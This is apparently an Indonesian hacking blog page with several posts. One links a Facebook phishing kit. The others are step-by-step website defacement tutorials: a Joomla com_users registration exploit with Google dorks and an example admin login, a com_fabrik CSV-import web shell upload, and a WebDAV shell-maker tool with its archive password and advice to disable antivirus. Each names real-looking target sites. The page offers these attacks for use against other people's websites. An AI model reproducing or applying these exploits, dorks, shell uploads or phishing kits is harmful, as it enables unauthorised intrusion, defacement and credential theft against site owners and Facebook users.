• 0

Tutorial Cara Membuat PHISING FACEBOOK

HEI..
KALI INI SAYA AKAN NGSHARE CARA PEMBUATAN PHISING FACEBOOK
KARNA BEGITU BANYAK REQUEST PENGGEMAR HIDDEN27 :v

Langsung Saja Ini Bahan Bahan Nya : DOWNLOAD

VIDIO NYA : KLIK UNTUK MELIHATNYA > IN HERE !
,  DOWNLOAD VIDIO  > IN HERE !

Posted by
Tuan-Bayu Lex

More
  • 0

CARA DEFACE MENGGUNAKAN METODE COM_USER


Silahkan tutorial ini di baca dulu baik2, dipahami dan dipelajari, baru dah sobat praktekin :p kalo seandainya gagal, itu karena website udah di patch :p

"Talk Less Do More!" :p

oke dah simak nih! sebelumnya download dulu bahan2nya :p

1. Download : Exploit Joomla.html

2. Titip Nama : Hidden_TEAM


UPDATE:

Ciri2 web yg vuln com_user, silahkan sobat check dulu login adminnya, jika seperti gambar dibawah, berarti web tersebut memungkinkan untuk bisa di exploitasi, selain itu tidak bisa...

Contoh :
http://troytradingint.com.pe/administrator/

bira lebih memudahkan sobat dalam mencari web target, silahkan gunakan Tool Scanner Com User

Demo:
http://troytradingint.com.pe/
http://www.uog.edu.pk/
http://www.trexperts.com/jeffreytmiller/

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah Langkah::

1. Cari web target di Google.com dengan memasukkan Dork berikut:

intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com

 #Dork Lain:
inurl:index.php/­using-joomla/­extensions/plugins
inurl:index.php/­using/joomla
inurl:index.php/­using-joomla/­extensions/­components/­content-component/­article-category-list­/50-upgraders
inurl:index.php/­using-joomla/­extensions/­components/­content-component/­article-categories/­28-park-site/­photo-gallery
inurl:index.php/­using-joomla/­parameters/­26-sample-data-articl­es/park-
Inurl:index.php/­plugins
Inurl:index.php/­rss=feed
inurl:index.php/­joomla/content/­category-blog/­24-joomla
inurl:index.php/­using-joomla/­extensions/­components/­content-component/­article-categories/­84-gd-articles
inurl:Home Page Beez joomla 1.6 index.php using-joomla
inurl:index.php joomla! 1.7 - open source content management
inurl:index.php/­using-joomla/­extension/components/­content-component/­article-category-list­/50-upgraders intext:joomla! 1.7 - open source content management
inurl:index.php/­19-sample-data-articl­es/joomla/­50-upgraders site:id inurl:index.php/­using-joomla/­extensions/templates/­beez-2/­home-page-beez-2
inurl:index.php/­19-sample-data-articl­es/joomla
inurl:Home Page Beez5 joomla 1.6 index.php/­using-joomla/­extensions/­components/­users-component/­registration-form

2. Pilih target sobat, lalu masukin exploit berikut:

index.php?option=com_users&view=registration

3. Ane disini mengambil contoh:

http://mobile.resto-lincontournable.com/index.php/utiliser-joomla/utiliser-extensions/composants/composant-flux-rss/un-flux-rss

4. kemudian ane ganti menjadi:

http://mobile.resto-lincontournable.com/index.php?option=com_users&view=registration


5. Setelah itu klik kanan>klik View Page Source atau bisa juga tekan tombol keyboard CTRL+U

kalo sudah muncul page sourcenya, lalu tekan tombol CTRL+F atau klik menu Find ketik hidden. cari seperti kode berikut:

6. Copy kode tersebut, lalu buka Exploit Joomla.html yang udah sobat download tadi dengan Notepad, lalu pastekan kode tersebut, dan masukkan juga site target dan Email sobat! liat gambar !
Note: username, email, boleh diganti sesuka hati.
7. Lalu Save! Setelah itu buka file Exploit Joomla.html nya, Klik Register!
8. Setelah itu akan muncul peringatan bahwa password harus diisi sama! Masukkan password sobat!


9. Setelah password diisi, klik Register! lalu buka email sobat dan klik link Konfirmasinya!







10. Lalu masuk kehalaman admin login nya! 
http://mobile.resto-lincontournable.com/administrator
11. Masukkan Username & Passwordnya! lalu klik Login! kalo contoh disini:

Username:genesis
Password:onix
Tararaaaaaaaaaaaaaa!! Sobat masuk sebagai admin! trus tebas deh index nya :p Liat Cara Tebas Index

KALO GA BERHASIL LOGIN SEBAGAI ADMIN, SILAHKAN CARI TARGET LAINNYA!!

Goodluck!!! :p

udah gitu aja! Salam........ :p

Posted by
Tuan-Bayu Lex

More
  • 0

CARA DEFACE DENGAN METODE COM_FABRIK

Langkah-Langkah:
1. Cari target dengan google dork ini
inurl:viewTable?cid= site:com 
*Site: Boleh diganti apa saja. ( contoh: ru /it /ac /za /fi dll )
*Google Dork, kreasikan sendiri.


2. Setelah web dibuka, maka akan muncul Sorry this form is not publish. dan masukkan exploit ini
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

contoh: http://www.toidupada.ee/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

3. Masukkan shell milik sobat (Pilih File)  dan lalu klik tombol import CSV

4. Setelah proses upload shell selesai, maka akan ada tampilan seperti gambar diatas atau mungkin berbeda dengan gambar diatas. lalu masuk ke dalam shellnya.
www.site.com/media/nama shell kamu.php
contoh: http://www.toidupada.ee/media/shell.php (Jika nama shell anda adalah shell)
*Jika berhasil, akan muncul tampilan shell milik anda. jika tidak berhasil, berarti cari target lain.
5. Klik pada tulisan htdocs/public_html/lainnya sesuai dengan webnya  (Tulisan kedua dari belakang).
*Setiap web tiidak selalu sama


6. Cari tulisan yang bernama index.php lalu edit.
*Bukan index.html / lainnya 


7. Hapus semua script web dan tempelkan script deface milikmu di index.php. lalu tekan tombol save.
8. Jika save succes maka akan muncul script anda di halaman utama web target.

Download TOOL : Download Hmei7

Posted by
Tuan-Bayu Lex

More
  • 0

Cara Menggunakan WEBDAV

Cara Deface Website Dengan Webdav Shell Maker | Hmei7
Ok deh langsung saja ke inti postingan kali ini, o'ya! disini saya hanya memberikan tutorial untuk pembelajaran. Bukan sok2'an jadi heker, cracker, ceker atau apalah, saya hanya ingin berbagi karena Berbagi Itu Indah 
Dengan menggunakan sebuah tools hacking buatan Hmei7 kita dapat dengan mudah menanam shell ke dalam sebuah website, dan dengan begitu kita dapat melakukan apa saja terhadap web yang kita tanami shell tersebut.
WebDav Shell Maker : Download Disini
Password : garudacyberattacker
1). Download kemudian extract file
2). Buka tools webdav yang sudah di download tadi, klik menu tab 'WebDav' lalu pilih 'Asp shell maker'.




3).Selanjutnya, pilih Add site, disini saya menggunakan target http://www.beijinggym.com/ lalu klik OK.



4)Jika Sudah Klik Serang :v



5).Jika Succes Akan Keluar Seperti Dan Buka Link Tersebut





6).Lalu Cari File Index.php/Index.html Tekan CTRL+F Biar Lebih Gampang




7).Lalu Masukin Dehh Script DefaceNya Dan Klik Kaydet



8). Buka Defacan Ente Dengan Cara :
http://Target Kamu.com/index.php

 NB:Matikan AntiVirus Sebelum Mengguakan WebDav Karena Anti Virus Anggap WebDav Sebagai Virus

Posted by
Tuan-Bayu Lex

More

Copyright © 2012 -[-£VØLܧîÓÑž-]-Template by :TheBayu Steady.Powered by Blogger.Please upgrade to a Modern Browser.